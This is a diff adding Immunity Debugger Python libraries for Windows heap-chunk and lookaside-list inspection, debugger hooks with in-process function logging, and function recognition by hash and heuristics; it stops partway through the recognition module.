+ self.UserDataHeader = self.getUserData( imm, self.UserBlocks )
+
+ # XXX: We need to check the "Next" for more chunks
+ list = self.grabBusyList( imm, self.UserBlocks, self.Offset, self.Depth)
+ self.chunks = self.getChunks( imm, self.UserBlocks + self.UserDataHeader.getSize(), list )
+
+ def grabBusyList(self, imm, base_addr, offset, depth):
+ list = {}
+ i = 1
+ for a in range(0, depth):
+ address = base_addr + offset
+ dword = imm.readLong( address + 8 )
+ offset = dword & 0xFFFF
+ offset *=8
+ list[ address ] = a + 1
+ return list
+
+ def getUserData(self, imm, addr):
+ return UserData( imm, addr )
+
+ def getChunks(self, imm, address, list):
+ #mem = imm.readMemory( self.UserBlocks, self.BlockSize * self.BlockCount)
+ addr = address
+ chunks = []
+ for a in range(0, self.BlockCount):
+ c = win32vistaheapchunk(imm, addr, BlockSize = self.BlockSize)
+ s = "B"
+ if list.has_key(addr):
+ c.setFreeOrder( list[addr] )
+ s = "F(%02d)" % list[addr]
+ #imm.Log("Chunk size: 0x%x lfhflag: 0x%x %s" % ( self.BlockSize, c.lfhflags, s ), address = addr)
+ addr += self.BlockSize*8
+ chunks.append( c )
+ return chunks
+
+class UserData:
+ def __init__(self, imm, addr):
+ self.address = addr
+ mem = imm.readMemory(addr, 0x10)
+ (self.SubSegment, self.Reserved, self.SizeIndex, self.Signature) =\
+ struct.unpack("LLLL", mem)
+ def getSize(self):
+ return 0x10
+
+class Bucket:
+ def __init__(self, addr, mem):
+ self.address = addr
+ (self.BlockUnits, self.SizeIndex, Flag) =\
+ struct.unpack("HBB", mem[:4])
+ # Theoretically, this is how the Flag are separated:
+ self.UseAffinity = Flag & 0x1
+ self.DebugFlags = (Flag >1) & 0x3
+
+class UserMemoryCache:
+ def __init__(self, addr, mem):
+ self.address = addr
+ (self.Next, self.Depth, self.Sequence, self.AvailableBlocks,\
+ self.Reserved) = struct.unpack("LHHLL", mem[ 0 : 16 ])
+
+class Blocks:
+ def __init__(self, imm, addr):
+ mem = imm.readMemory( addr, 0x24 )
+ if not mem:
+ raise Exception, "Can't read Block at 0x%08x" % addr
+ self.address = addr
+ self.FreeListInUse = None
+ self.FreeList = []
+ (self.FwLink, self.MaxSize, self.CtrZone, self.field_c,
+ self.field_10, self.StartSize, self.FreeListPtr,\
+ self.FreeListInUsePtr, self.Buckets) =\
+ struct.unpack( "L" * 9, mem )
+ def setFreeListInUse(self, inuse):
+ self.FreeListInUse = inuse
+
+ def setFreeList(self, flist):
+ self.FreeList = flist
+
+SHOWCHUNK_FULL = 0x1
+CHUNK_ANALIZE = 0x2
+class win32heapchunk:
+ FLAGS = { 'EXTRA PRESENT':('E', 0x2), 'FILL PATTERN':('FP', 0x4),\
+ 'VIRTUAL ALLOC': ('V', 0x8), 'TOP': ('T', 0x10),
+ 'FFU1':('FFU1',0x20), 'FFU2': ('FFU2', 0x40),\
+ 'NO COALESCE':('NC', 0x80) }
+ BUSY = ('BUSY', ('B', 0x1))
+ def __init__(self, imm, addr, heap = None):
+ """ Win32 Chunk """
+ self.imm = imm # later replace it with heap.imm
+
+ self.restored = False
+
+ if heap:
+ self.heap_addr = heap.address
+ else:
+ self.heap_addr = 0
+ self.nextchunk=0
+ self.prevchunk=0
+ self.addr = addr
+
+ try:
+ dword1 = self.imm.readLong(addr)
+ dword2 = self.imm.readLong(addr+4)
+ except Exception:
+ raise Exception, "Failed to read chunk at address: 0x%08x" % addr
+
+ self._get( dword1, dword2, addr )
+
+
+ def _get(self, size, flags, addr):
+ self.size = size & 0xffff
+ self.usize = self.size * 8 # unpacked
+
+ self.psize = ( size >> 16 ) & 0xffff
+ self.upsize = self.psize * 8
+
+ self.field4 = flags & 0xff
+ self.flags = (flags >> 8) & 0xff
+ self.other = (flags >> 16) & 0xffff
+ mem_addr = addr + 8
+ if not (self.flags & self.BUSY[1][1] ):
+ if self.flags & self.FLAGS['VIRTUAL ALLOC'][1]:
+ pass
+ else:
+ try:
+ self.nextchunk= self.imm.readLong(addr+8)
+ self.prevchunk= self.imm.readLong(addr+12)
+ except WindowsError:
+ raise Exception, "Failed to read chunk at address: 0x%08x" % addr
+
+ mem_addr +=8
+
+ self.data_addr = mem_addr
+ self.data_size = self.upsize - (addr - mem_addr)
+
+ try:
+ self.sample = self.imm.readMemory(self.data_addr, 0x10)
+ except WindowsError:
+ raise Exception, "Failed to read chunk at address: 0x%08x" % addr
+
+ self.properties= {'size': self.usize, 'prevsize': self.upsize, 'field4': self.field4,\
+ 'flags':self.flags, 'other':self.other, 'address':self.addr,\
+ 'next': self.nextchunk, 'prev': self.prevchunk}
+
+ def setRestored(self):
+ self.restored = True
+
+ def isRestore(self):
+ return self.restored
+
+ def get(self, what):
+ try:
+ return self.properties[string.lower(what)]
+ except KeyError:
+ return None
+
+ def printchunk(self, uselog= None, option=0, dt= None):
+ ret = []
+ if self.isRestore():
+ restore = ""
+ else:
+ restore = ""
+ ret.append((self.addr, "0x%08x> " % self.addr + "size: 0x%08x (%04x) prevsize: 0x%08x (%04x) %s" % (self.usize, self.size, \
+ self.upsize, self.psize, restore) ))
+ ret.append((self.addr, " heap: *0x%08x* flags: 0x%08x (%s)" % (self.heap_addr, self.flags,\
+ self.getflags(self.flags))))
+ #print "unused: 0x%08x flags: 0x%08x (%s)" % (self.field4, self.flags,\
+ # self.getflags(self.flags))
+ if not (self.flags & self.BUSY[1][1]):
+ ret.append((self.addr, " next: 0x%08x prev: 0x%08x" % (self.nextchunk, self.prevchunk)))
+ if option & SHOWCHUNK_FULL:
+ dump = immutils.hexdump(self.sample)
+ for a in range(0, len(dump)):
+ if not a:
+ ret.append((self.addr, " (%s %s)" % (dump[a][0], dump[a][1])))
+ if dt:
+ result = dt.Discover(self.imm.readMemory(self.data_addr, self.data_size), self.data_addr)
+ #self.imm.Log( str(ret ))
+ for obj in result:
+ msg = obj.Print()
+ ret.append((obj.address, " > %s: %s " % (obj.name, msg) ))
+ #imm.Log( "obj: %s: %s %d" % (obj.name, msg, obj.getSize() ), address = obj.address)
+
+ if uselog:
+ for adr, msg in ret:
+ uselog(msg, address = adr)
+
+ return ret
+
+ def getflags(self, flag):
+ f=""
+ if self.flags & self.BUSY[1][1]:
+ f+=self.BUSY[1][0]
+ else:
+ f+="F"
+
+ for a in self.FLAGS.keys():
+ if self.FLAGS[a][1] & self.flags:
+ f+="|" + self.FLAGS[a][0]
+ return f
+
+ def istop(self):
+ if self.flags & self.FLAGS['TOP'][1]:
+ return 1
+ return 0
+
+ def isfirst(self):
+ if self.psize == 0:
+ return 1
+ return 0
+
+
+class win32vistaheapchunk(win32heapchunk):
+ FLAGS = { 'FILL PATTERN':('FP', 0x4), 'DEBUG': ('D', 0x8),\
+ 'TOP': ('T', 0x10), 'FFU1':('FFU1',0x20),\
+ 'FFU2': ('FFU2', 0x40), 'NO COALESCE':('NC', 0x80) }
+ LFHMASK = 0x3F
+ LFHFLAGS = { 'TOP': ('T', 0x3), 'BUSY': ('B', 0x18) }
+
+ def __init__(self, imm, addr, heap = None, BlockSize = 0):
+ self.heap = heap
+ self.freeorder = -1
+ self.isLFH = False
+ if BlockSize:
+ self.isLFH = True
+ self.size = BlockSize
+ win32heapchunk.__init__(self, imm, addr, heap)
+
+ def setFreeOrder(self, freeorder):
+ self.freeorder = freeorder
+
+ def _get(self, dword1, dword2, addr):
+ heap = self.heap
+ self.nextchunk= 0
+ self.prevchunk= 0
+ if heap and heap.EncodeFlagMask:
+ dword1 ^= heap.EncodingKey
+ dword2 = dword2 ^ heap.EncodingKey2
+
+ self.subsegmentcode = self.SubSegmentCode = dword1
+ if self.isLFH:
+ self.upsize = self.usize = self.size << 3
+ self.psize = self.size
+ else:
+ self.size = dword1 & 0xffff
+ self.usize = self.size << 3
+ self.psize = dword2 & 0xffff
+ self.upsize = self.psize << 3
+
+ self.flags = (dword1 >> 16 & 0xff)
+ self.smalltagindex = (dword1 >> 24 & 0xff)
+
+ self.segmentoffset = (dword2 >> 16 & 0xff)
+ self.unused = (dword2 >> 24 & 0xff)
+ self.flags2 = self.unused # LOW FRAGMENTATION HEAP FLAGS
+ self.lfhflags = self.flags2
+
+
+ self.data_addr = addr + 8
+
+ self.properties= {'size': self.usize, 'prevsize': self.upsize, 'smalltagindex': self.smalltagindex,\
+ 'flags':self.flags, 'subsegmentcode':self.subsegmentcode, 'address':self.addr,\
+ 'next': self.nextchunk, 'prev': self.prevchunk, 'lfhflags': self.flags2,\
+ 'segmentoffset': self.segmentoffset }
+ self.data_size = self.usize - (self.addr - self.data_addr)
+ #self.imm.Log("datasize: 0x%d" % self.data_size, address = self.addr)
+ try:
+ self.sample = self.imm.readMemory(self.data_addr, 0x10)
+ except WindowsError:
+ raise Exception, "Failed to read chunk at address: 0x%08x" % addr
+
+ def getflags(self, flag):
+ f=""
+ if not self.isLFH:
+ if self.flags & self.BUSY[1][1]:
+ f+=self.BUSY[1][0]
+ else:
+ f+="F"
+
+ for a in self.FLAGS.keys():
+ if self.FLAGS[a][1] & self.flags:
+ f+="|" + self.FLAGS[a][0]
+ else:
+ for k in self.LFHFLAGS.keys():
+ if self.flags2 == self.LFHFLAGS[k][1]:
+ return self.LFHFLAGS[k][0]
+ return f
+
+ def istop(self):
+ if self.flags2 == self.LFHFLAGS['TOP'][1] :
+ return 1
+ else:
+ return 0
+
+ def printchunk(self, uselog= None, option=0, dt= None):
+ ret = []
+ if self.isRestore():
+ restore = ""
+ else:
+ restore = ""
+ if self.isLFH:
+ s = "B"
+ if self.freeorder != -1:
+ s="F(%02x)" % self.freeorder
+ ret.append( (self.addr, "Chunk size: 0x%x lfhflag: 0x%x %s" % ( self.psize, self.lfhflags, s )) )
+ else:
+ ret.append((self.addr, "0x%08x> " % self.addr + "size: 0x%08x (%04x) prevsize: 0x%08x (%04x) %s" % (self.usize, self.size, \
+ self.upsize, self.psize, restore) ))
+ ret.append((self.addr, " heap: *0x%08x* flags: 0x%02x 0x%02x (%s)" % (self.heap_addr, self.flags, self.flags2,\
+ self.getflags(self.flags))))
+ if not self.isLFH and not (self.flags2 & self.BUSY[1][1]):
+ ret.append((self.addr, " next: 0x%08x prev: 0x%08x" % (self.nextchunk, self.prevchunk)))
+ if option & SHOWCHUNK_FULL:
+ dump = immutils.hexdump(self.sample)
+ for a in range(0, len(dump)):
+ if not a:
+ ret.append((self.addr, " (%s %s)" % (dump[a][0], dump[a][1])))
+ if dt:
+ if not self.isLFH or (self.isLFH and self.freeorder == -1) :
+ result = dt.Discover(self.imm.readMemory(self.data_addr, self.data_size), self.data_addr)
+ for obj in result:
+ msg = obj.Print()
+ ret.append((obj.address, " > %s: %s " % (obj.name, msg) ))
+
+ if uselog:
+ for adr, msg in ret:
+ uselog(msg, address = adr)
+
+ return ret
+
+
+class PHeapLookaside(UserList):
+ def __init__(self, imm, addr, heap = 0x0, log = None ):
+ """ Win32 Heap Lookaside list """
+ UserList.__init__(self)
+ if not log:
+ log = imm.Log
+ self.log = log
+ self.imm = imm
+ self.heap = heap
+ self.Lookaside = []
+
+ LookSize = PLook(self.imm, 0x0).getSize()
+ mem = imm.readMemory(addr, LookSize * HEAP_MAX_FREELIST)
+
+ for ndx in range(0, HEAP_MAX_FREELIST):
+ base_addr = addr + ndx * LookSize
+ l = PLook(self.imm, base_addr, mem[ ndx * LookSize : ndx * LookSize + LookSize ], self.heap )
+
+ self.data.append(l)
+ next = l.ListHead
+ while next and next != base_addr:
+ l.append( next )
+ try:
+ next = self.imm.readLong(next)
+ except:
+ break
+
+
+class PLook:
+ def __init__(self, imm, addr, data = None, heap = 0x0, log= None):
+ self.log = log
+ self.addr = addr
+ self.List = []
+ self.fmt = "LLHHLLLLLL12s"
+ self.imm = imm
+ self.heap = heap
+
+ # XXX: This need some check, cause my calculation might be wrong
+ if data:
+ (self.ListHead, none, self.Depth, self.MaxDepth, self.TotalAlloc, self.AllocMiss, self.TotalFrees,
+ self.FreeMiss, self.AllocLastTotal, self.LastAllocateMiss, self.Unknown) = \
+ struct.unpack(self.fmt, data[:struct.calcsize(self.fmt)])
+ elif addr:
+ data = self.imm.readMemory(addr, self.getSize() )
+ (self.ListHead, none, self.Depth, self.MaxDepth, self.TotalAlloc, self.AllocMiss, self.TotalFrees,
+ self.FreeMiss, self.AllocLastTotal, self.LastAllocateMiss, self.Unknown1, self.Unknown2) = \
+ struct.unpack(self.fmt, data[:struct.calcsize(self.fmt)])
+
+ def isEmpty(self):
+ return self.ListHead == 0x0
+
+ def getSize(self):
+ return struct.calcsize(self.fmt)
+
+ def append(self, andres):
+ self.List.append(andres)
+
+ def getList(self):
+ """get a the single linked list of the Lookaside entry
+ @return: A list of the address of the linked list"""
+ return self.List
+
+ def getChunks(self):
+ """get a the single linked list of the Lookaside entry
+ @return: A list of the Chunks on the linked list"""
+
+ chunks = []
+ for addr in self.List:
+ # The Address of the Single Linked list of the Lookaside points to the data of the chunk.
+ # so, we need to increase 8 bytes to get into the begging of the header
+ chunks.append( win32heapchunk(self.imm, addr - 8, self.heap ) )
+
+ return chunks
+
+class SearchHeap:
+ def __init__(self, imm, what, action, value, heap = 0x0, restore = False, option = 0):
+ """
+ Search the Heap for specific Chunks
+
+ @type imm: Debugger Object
+ @param imm: Initialized debugged object
+
+ @type what: STRING
+ @param what: Chunk property to search from (size, prevsize, field4, flags, other, address, next, prev)
+
+ @type action: STRING
+ @param action: Type of search ( =, >, <, >=, <=, &, not, !=)
+
+ @type value: DWORD
+ @param value: Value to search for
+
+ @type heap: DWORD
+ @param heap: (Optional, Def=None) Filter by Heap
+
+ @type restore: BOOLEAN
+ @param restore: (Optional, Def: False) Flag whether or not use a restore heap (Useful if you want to search on a broken heap)
+
+ @type option: DWORD
+ @param option: (Optional, Def: None) Chunk's display option
+ """
+ self.functions = { '=': lambda a, b: a==b,
+ '>': lambda a,b : a>b,
+ '<': lambda a,b : a=': lambda a,b : a>=b,
+ '<=': lambda a,b : a<=b,
+ '&': lambda a,b : a&b,
+ 'not': lambda a,b: a & ~b,
+ #'find': lambda a,b: a.find(b) > -1,
+ '!=': lambda a,b : a!=b
+ }
+ for a in imm.getHeapsAddress():
+ if a==heap or not heap:
+ #imm.Log("Dumping heap: 0x%08x" % a, address = a, focus = 1 )
+ p = imm.getHeap( a, restore )
+ if not what or not action:
+ for c in p.chunks:
+ c.printchunk(uselog = imm.Log, option = option)
+ else:
+ for c in p.chunks:
+ if self.functions[action](c.get(what) , value):
+ c.printchunk(uselog = imm.Log, option = option)
diff --git a/1.73/Libs/libhook.py b/1.73/Libs/libhook.py
new file mode 100755
index 0000000..2e6adb9
--- /dev/null
+++ b/1.73/Libs/libhook.py
@@ -0,0 +1,427 @@
+#!/usr/bin/env python
+
+"""
+(c) Immunity, Inc. 2004-2007
+
+
+U{Immunity Inc.}
+
+
+"""
+
+__VERSION__ = '1.1'
+
+import struct
+import debugger
+import pickle
+
+FS_UNHOOK = 0
+FS_HOOK = 1 # hooked and running
+FS_PAUSE = 2
+
+HookTypes = {"ORDINARY_BP_HOOK" : 3900, "LOG_BP_HOOK" : 3909,\
+ "EVERY_EXCEPTION_HOOK" : 3901,\
+ "POST_ANALYSIS_HOOK" : 3902, "ACCESS_VIOLATION_HOOK": 3910,\
+ "LOAD_DLL_HOOK" : 3903, "UNLOAD_DLL_HOOK" : 3904,\
+ "CREATE_THREAD_HOOK" : 3905, "EXIT_THREAD_HOOK" : 3906,\
+ "CREATE_PROCESS_HOOK" : 3907, "EXIT_PROCESS_HOOK" : 3908,\
+ "PRE_BP_HOOK" : 3911}
+
+HOOK_REG = {'ESI': '[ESP+4 ]', 'EDI': '[ESP]',\
+ 'EBX': '[ESP+0x10]', 'EAX': '[ESP+0x1C]',\
+ 'ECX': '[ESP+0x18]', 'EDX': '[ESP+0x14]',\
+ 'EBP': '[ESP+0x8 ]', 'ESP': '[ESP+0xC ]'}
+
+
+class FastLogHook:
+ def __init__(self, imm):
+ self.address = None
+ self.tbl = []
+ self.list = []
+ self.entry = []
+ self.hooked = False
+ self.mem = None
+ self.imm = imm
+ self.restore = []
+ self.status = FS_UNHOOK
+ self.AllocSize = 0
+ self.memAddress = 0
+
+ def isHooked(self):
+ return self.status == FS_HOOK
+
+ def isPause(self):
+ return self.status == FS_PAUSE
+
+ def Pause(self):
+ if not self.isHooked():
+ return False
+
+ # Removing Hook on every function
+ for ndx in range(0, len(self.tbl) ):
+ self.imm.writeMemory( self.tbl[ndx][0], self.restore[ndx][0] )
+
+ self.status = FS_PAUSE
+ return True
+
+ def Continue(self):
+ if not self.isPause():
+ return False
+
+ for ndx in range(0, len(self.tbl) ):
+ self.imm.writeMemory( self.tbl[ndx][0], self.restore[ndx][1] )
+ self.status = FS_HOOK
+ return True
+
+ def unHook(self):
+ if not self.isHooked():
+ return False
+
+ # Removing Hook on every function
+ for ndx in range(0, len(self.tbl) ):
+ self.imm.writeMemory( self.tbl[ndx][0], self.restore[ndx][0] ) # Cleaning up Hook Memory
+ self.imm.rVirtualFree( self.mem )
+ self.status = FS_UNHOOK
+ return True
+
+ def setRestore(self, restore):
+ self.restore = restore
+
+ def Hook(self):
+ self.addFastLogHook()
+ self.status = FS_HOOK
+ return True
+
+ def setMem(self, mem):
+ self.mem = mem
+
+ def logFunction(self, address):
+ if self.address:
+ self.tbl.append( (self.address, self.entry) )
+ self.entry = []
+ self.address = address
+
+ def logRegister(self, REG):
+ self.entry.append( (REG,) )
+
+ def logDirectMemory(self, address):
+ self.entry.append( (address,) )
+
+ def logBaseDisplacement(self, REG, offset = 0 ):
+ self.entry.append( ( REG, offset) )
+
+ def getAllUniqueFunctions(self):
+ ndx = 0
+ addr = self.mem
+ self._fn = {}
+ self.ret = []
+
+ while ndx != -1 :
+ mem = self.imm.readMemory( addr, 0x1000)
+ ndx = self._parseUniqueFn( mem )
+ addr += ndx
+
+ return self._fn
+
+ def getAllLog(self):
+ mem = ""
+ self.ret = []
+ flag = False
+ addr = self.mem
+ end = self.imm.readLong(self.memAddress)
+
+ mem = self.imm.readMemory( addr, end-addr)
+ self._parseMem( mem )
+
+ return self.ret
+
+ def _parseUniqueFn(self, mem):
+ mem_size = len(mem)
+ ndx = 0
+ while ndx < len(mem):
+ index = struct.unpack("L", mem[ ndx : ndx+4 ] )[0]
+ if index == 0:
+ return -1 # Finished correctly
+ if index > (len(self.tbl) + 1) :
+ return -1
+
+ entry = self.tbl[ index -1 ][1]
+ ndx += 4
+ size_e = len(entry)
+ if (size_e*4 + ndx) > ( mem_size):
+ return ndx - 4 # REQUEST MORE MEM
+ ndx += size_e * 4
+
+ addr = self.tbl[ index -1 ][0]
+ if self._fn.has_key( addr ):
+ self._fn[ addr ] += 1
+ else:
+ self._fn[ addr ] = 1
+ return ndx
+
+
+ def Clear(self):
+ #self.imm.writeLong( self.mem, 0x0 )
+ self.imm.writeLong( self.memAddress, self.mem )
+
+
+ def _parseMem(self, mem):
+ mem_size = len(mem)
+ ndx = 0
+ #self.imm.Log("table: %d" % len(self.tbl) )
+ while ndx < len(mem) :
+ index = struct.unpack("L", mem[ ndx : ndx+4 ] )[0]
+ #self.imm.Log("Index: %d" % index)
+ if index == 0:
+ return -1 # Finished correctly
+ if index > (len(self.tbl) + 1) :
+ return -1
+
+ entry = self.tbl[ index -1 ][1]
+ ndx += 4
+ size_e = len(entry)
+ if (size_e*4 + ndx) > ( mem_size):
+ return ndx - 4 # REQUEST MORE MEM
+ ret = struct.unpack( "L" * size_e, mem[ ndx : ndx + size_e *4 ] )
+ ndx += size_e * 4
+ self.ret.append( ( self.tbl[ index - 1 ][0], ret) )
+ return ndx
+
+ def get(self):
+ self.logFunction(None)
+ return self.tbl
+
+ def setTable(self, tbl):
+ self.tbl = tbl
+
+ def addFastLogHook(self, alloc_size = 0x100000, memAddress = 0x0):
+ CODE_HOOK_START = 8
+ #flh = hook
+ # Get the table of functions from the hook
+ self.AllocSize = alloc_size
+
+ table = self.get()
+ self.imm.Log("TABLE SIZE: %d" % len(table) )
+ # Allocate memory for the hook and the log
+ if not memAddress:
+ memAddress = self.imm.remoteVirtualAlloc( alloc_size )
+
+ self.memAddress = memAddress
+
+ self.imm.Log( "Logging at 0x%08x" % memAddress )
+
+ # MEMORY LOOKS LIKE:
+ # mem [ ptr to data ]
+ # mem + 4 [ deadlock ]
+ # mem + 8 [ start of hook code ]
+ # mem + n [ ... ]
+ # mem + n [ start of data ]
+
+ ptr = memAddress + CODE_HOOK_START
+
+ fn_restore = []
+
+# for fn_ndx in range( 0, len(table) ):
+ fn_ndx = 0
+ while fn_ndx < len(table) :
+ hookAddress = table[ fn_ndx ][0]
+ entry = table[ fn_ndx ][1]
+
+ idx = 0
+ #patch_code = self.imm.Assemble( "PUSH 0x%08x\nRET" % ptr )
+ patch_code = self.imm.Assemble( "JMP 0x%08x" % ptr, address = hookAddress )
+
+ while idx < len(patch_code):
+ op = self.imm.Disasm( hookAddress + idx )
+ idx += op.getOpSize()
+ if op.isCall() or op.isJmp():
+ op = None
+ break
+
+ # Removing the BP from the table
+ if not op:
+ self.imm.Log("deleting: %d" % fn_ndx)
+ del table[ fn_ndx ]
+ continue
+
+ ex_prelude = self.imm.readMemory( hookAddress, idx )
+
+ code = self.imm._createCodeforHook( memAddress, hookAddress + idx,\
+ fn_ndx + 1, entry, ex_prelude, alloc_size)
+
+ self.imm.writeMemory( ptr , code )
+ ptr += len(code)
+ self.imm.writeMemory( hookAddress, patch_code )
+
+ fn_restore.append( (ex_prelude, patch_code ) ) # Correspond in index with function address
+ fn_ndx += 1
+
+ self.setTable( table )
+ if ptr % 4:
+ ptr = 4 + ptr & ~(4-1)
+ self.setMem( ptr )
+ self.imm.writeLong( memAddress, ptr )
+ self.setRestore( fn_restore )
+
+
+
+class STDCALLFastLogHook(FastLogHook):
+ def __init__(self, imm):
+ FastLogHook.__init__(self, imm)
+ def logFunction(self, address, args = 0 ):
+ if self.address:
+ self.tbl.append( (self.address, self.entry) )
+ self.entry = []
+
+ self.address = address
+ for ndx in range(0, args):
+ self.logBaseDisplacement( "ESP", ndx*4 + 4 )
+
+#HOOK class
+class Hook:
+ def __init__(self):
+ self.type=0
+ self.msg=""
+ self.string=""
+ self.address=0
+ self.enabled=True # by default hook is enabled
+
+ def enable(self):
+ """Enable hook execution"""
+ self.enabled=True
+
+ def disable(self):
+ """Disable hook execution"""
+ self.enabled=False
+
+ def UnHook(self):
+ """Remove the hook"""
+ debugger.Removehook(self.desc)
+
+ def add(self,description,address=0,force=0,timeout=0,mode=0):
+ """Add hook to Immunity Debugger hook database
+ @param type: Type of hook
+ @param desc: Descriptive string
+ @param force: Force hook adding
+ @param timeout: time to live in memory
+ @param mode: thread mode of ttl execution
+ """
+
+ self.desc = description
+ self.address = address
+ self.force=force
+ self.timeout=timeout
+ # mode = 1 then, execute ttl hook in the same thread enviroment as the python command/script
+ # mode = 0 use your own thread enviroment to place and execute the ttl hook
+ # you'll be using mode = 0 at least you really know what you are doing.
+
+ self.mode=mode
+ if self.type == HookTypes["ORDINARY_BP_HOOK"]:
+ debugger.Setbreakpoint(self.address,0x200L,"")
+ elif self.type == HookTypes["LOG_BP_HOOK"]:
+ debugger.Setloggingbreakpoint(self.address)
+ pickled_object = pickle.dumps(self)
+ return debugger.Addhook( pickled_object , self.desc , self.type, self.address,self.force,self.timeout,self.mode)
+
+ def _run(self,regs):
+ """regs is the actual cpu context, be sure of using this values
+ and not the ones from imm.getRegs() at hook time"""
+ self.regs=regs
+ self.run(regs)
+
+ def _runTimeout(self,regs):
+ """regs is the actual cpu context, be sure of using this values
+ and not the ones from imm.getRegs() at hook time"""
+ self.regs=regs
+ self.runTimeout(regs)
+
+
+ # function that will be runned once the hook is triggered
+ def run(self,regs):
+ debugger.Error("Your hook doesnt seem to have run() defined")
+ return
+
+ def runTimeout(self,regs):
+ debugger.Error("Your hook doesnt seem to have runTimeout() defined")
+ return
+
+
+class BpHook(Hook):
+ def __init__(self):
+ Hook.__init__(self)
+ self.type = HookTypes["ORDINARY_BP_HOOK"]
+ self.desc = "BreakpointHook"
+
+class LogBpHook(Hook):
+ def __init__(self):
+ Hook.__init__(self)
+ self.type = HookTypes["LOG_BP_HOOK"]
+ self.desc = "LoggingPointHook"
+
+class PreBpHook(Hook):
+ def __init__(self):
+ Hook.__init__(self)
+ self.type = HookTypes["PRE_BP_HOOK"]
+ self.desc = "PreBreakpointHook"
+
+class AllExceptHook(Hook):
+ def __init__(self):
+ Hook.__init__(self)
+ self.type = HookTypes["EVERY_EXCEPTION_HOOK"]
+ self.desc = "EveryExceptionHook"
+
+class PostAnalysisHook(Hook):
+ def __init__(self):
+ Hook.__init__(self)
+ self.type = HookTypes["POST_ANALYSIS_HOOK"]
+ self.desc = "PostAnalysisHook"
+
+class AccessViolationHook(Hook):
+ def __init__(self):
+ Hook.__init__(self)
+ self.type = HookTypes["ACCESS_VIOLATION_HOOK"]
+ self.desc = "AcessViolationHook"
+
+class RunUntilAV(Hook):
+ def __init__(self,imm):
+ Hook.__init__(self)
+ self.type = HookTypes["ACCESS_VIOLATION_HOOK"]
+ self.desc = "AcessViolationHook"
+ imm.Run()
+
+
+class LoadDLLHook(Hook):
+ def __init__(self):
+ Hook.__init__(self)
+ self.type = HookTypes["LOAD_DLL_HOOK"]
+ self.desc = "LoadDLLHook"
+
+class UnloadDLLHook(Hook):
+ def __init__(self):
+ Hook.__init__(self)
+ self.type = HookTypes["UNLOAD_DLL_HOOK"]
+ self.desc = "UnloadDLLHook"
+
+class CreateThreadHook(Hook):
+ def __init__(self):
+ Hook.__init__(self)
+ self.type = HookTypes["CREATE_THREAD_HOOK"]
+ self.desc = "CreateThreadHook"
+
+class ExitThreadHook(Hook):
+ def __init__(self):
+ Hook.__init__(self)
+ self.type = HookTypes["EXIT_THREAD_HOOK"]
+ self.desc = "ExitThreadHook"
+
+class CreateProcessHook(Hook):
+ def __init__(self):
+ Hook.__init__(self)
+ self.type = HookTypes["CREATE_PROCESS_HOOK"]
+ self.desc = "CreateProcessHook"
+
+class ExitProcessHook(Hook):
+ def __init__(self):
+ Hook.__init__(self)
+ self.type = HookTypes["EXIT_PROCESS_HOOK"]
+ self.desc = "ExitProcessHook"
diff --git a/1.73/Libs/librecognition.py b/1.73/Libs/librecognition.py
new file mode 100755
index 0000000..ac792cf
--- /dev/null
+++ b/1.73/Libs/librecognition.py
@@ -0,0 +1,780 @@
+"""
+(c) Immunity, Inc. 2004-2007
+
+
+U{Immunity Inc.}
+
+
+Library for function recognizing
+
+"""
+__VERSION__ = '1.2'
+
+
+from libanalyze import *
+from libdatatype import *
+from libstackanalyze import *
+import binascii
+import struct
+import hashlib
+import re
+import string
+import debugger
+import csv
+import os
+
+class MultiCSVIterator:
+ def __init__(self, dictionaries):
+ if not isinstance(dictionaries, list):
+ dictionaries = [ dictionaries ]
+
+ self.iterators = []
+ self.fds = []
+ self.idx = 0
+ for d in dictionaries:
+ try:
+ fd = open(d, "rb")
+ except:
+ fd = open(d, "w+b")
+ self.iterators.append(csv.reader(fd))
+ self.fds.append(fd)
+ def __iter__(self):
+ for i in range(0, self.idx+1):
+ self.fds[i].seek(0)
+ self.idx = 0
+ return self
+
+ def __del__(self):
+ while self.iterators:
+ self.iterators.pop()
+ for fd in self.fds:
+ fd.close()
+ del self.fds
+
+ def next(self):
+ try:
+ data = self.iterators[self.idx].next()
+ except StopIteration:
+ if len(self.iterators) > self.idx+1:
+ self.idx += 1
+ return self.next()
+ else:
+ raise StopIteration
+ #append the filename to each line
+ data.append(self.fds[self.idx].name)
+ return data
+
+class FunctionRecognition:
+ def __init__(self, imm, dictionaryfiles=None):
+ """
+ This class try to recognize a function using different methods
+ (address/signature/heuristic).
+
+ @type imm: Debbuger OBJECT
+ @param imm: Debbuger instance
+
+ @type dictionaryfiles: STRING|LIST
+ @param dictionaryfiles: Name, or list of names, of .dat files inside the Data folder, where're stored the function
+ patterns. Use an empty string to use all .dat files in Data folder.
+ """
+ self.imm = imm
+ self.heuristicReferencesCache = {}
+ self.heuristicCache = {}
+ self.resolvCache = {}
+
+ if not dictionaryfiles:
+ dictionaryfiles = []
+ for file in os.listdir("Data"):
+ if file[-4:] == ".dat":
+ dictionaryfiles.append(os.path.join("Data", file))
+ self.dictionaries = MultiCSVIterator(dictionaryfiles)
+
+ def resolvFunctionByAddress(self, address, heuristic=90):
+ """
+ Look up into our dictionaries to find a function match.
+
+ @type address: DWORD
+ @param address: Address of the function to search
+
+ @type heuristic: INTEGER
+ @param heuristic: heuristic threasold to consider a real function match
+
+ @rtype: STRING
+ @return: a STRING with the function's real name or the given address if there's no match
+ """
+
+ #cache the answers
+ if self.resolvCache.has_key(address):
+ return self.resolvCache[address]
+
+ #try the exact hash method
+ exact = self.makeFunctionHashExact(address)
+ for data in self.dictionaries:
+ if exact == data[4]:
+ self.resolvCache[address] = data[0]
+ break
+
+ #try the heuristic method
+ if not self.resolvCache.has_key(address):
+ ref = self.selectBasicBlock(address)
+ posThreshold = 0
+ posName = ""
+ for data in self.dictionaries:
+ #cut down the possibilities, because the performance, reproducing the BB selection and comparing the result
+ #XXX: it's not a perfect way, thinking of supporting version changes
+ if ref == data[1]:
+ perc = self.checkHeuristic(address, data[2], data[3])
+ #self.imm.Log("similar to function %s in %d%%" % (data[0], perc))
+ if perc >= heuristic and perc > posThreshold:
+ posThreshold = perc
+ posName = data[0]
+ if posName:
+ self.resolvCache[address] = posName
+
+ #cache the negative answer
+ if not self.resolvCache.has_key(address):
+ self.resolvCache[address] = "%08X" % address
+
+ return self.resolvCache[address]
+
+ def checkHeuristic(self, address, reference, refFirstCall=[]):
+ """
+ Check a given address with a precomputed hash of a function.
+ Return a percentage of match (you can use a threasold to consider a real match)
+
+ @type address: DWORD
+ @param address: Address of the function to compare
+
